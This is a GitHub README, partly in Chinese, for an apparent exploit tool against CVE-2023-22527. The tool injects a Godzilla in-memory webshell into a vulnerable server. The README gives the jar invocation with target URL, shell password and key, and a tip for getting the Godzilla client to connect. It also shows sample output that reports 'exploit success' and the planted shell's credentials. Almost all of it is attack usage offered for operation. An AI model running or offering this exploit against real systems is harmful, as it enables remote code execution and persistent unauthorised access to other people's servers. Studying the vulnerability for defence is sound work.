Skip to content

Latest commit

 

History

History
36 lines (25 loc) · 876 Bytes

File metadata and controls

36 lines (25 loc) · 876 Bytes

CVE-2023-22527-Godzilla-MEMSHELL

Usage

ps: 测试版本为:8.5.1,其他版本肯定也可以,但没有测试

内容参考北辰师傅之前的工具

java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar url 哥斯拉密码 哥斯拉密钥

example
        java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://xxxx/  pass key

如果内存Shell已经注入成功但哥斯拉无法连接,请在请求配置添加以下协议头或者为哥斯拉配置Burp代理

Connection: close

$ java -jar .\CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://127.0.0.1:8090/ qaxnb key
[*] Exploit url: http://127.0.0.1:8090/template/aui/text-inline.vm
Response Code: 200
Response Code: 200
[*] send payload
Validate Response Code: 200
[*] exploit success
[*] godzilla webshell password : qaxnb
[*] godzilla webshell key : key

img.png